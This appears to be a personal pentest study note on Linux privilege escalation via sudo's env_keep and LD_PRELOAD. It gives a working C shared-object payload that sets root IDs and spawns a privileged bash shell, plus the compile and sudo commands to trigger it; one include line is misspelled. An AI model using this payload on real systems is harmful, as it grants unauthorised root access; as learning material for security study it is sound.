# Environment Variables Programs run through sudo can inherit the environment variables from the user's environment. In the /etc/sudoers config file, if the env_reset options is set, sudo will run programs in a new, minimal environment. The env_keep option can be used to keep certain environment variables from the user's environment. The configured options are displayed when running sudo -l ## LD_PRELOAD LD_PRELOAD is an environment variable which can be set to the path of the shared object (.so) file. When set, the shared object will be loaded before any others. By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded. LD_PRELOAD will not work if the real user ID is different from the effective user ID. sudo must be configured to preserve the LD_PRELOAD environment variable using the env_keep option. ![[Pasted image 20220805230150.png]] #### preload.c ```c #include <studio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); } ``` Given the above env_keep and LD_PRELOAD configuration, the c program above should spawn a root shell when loaded. Compile the above code: ```bash $ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c ``` Run any allowed program using sudo while setting the LD_PRELOAD environment variable to the full path of the shared object that was just created, we should get a root shell. example: ```bash $ sudo LD_PRELOAD=/tmp/preload.so find ```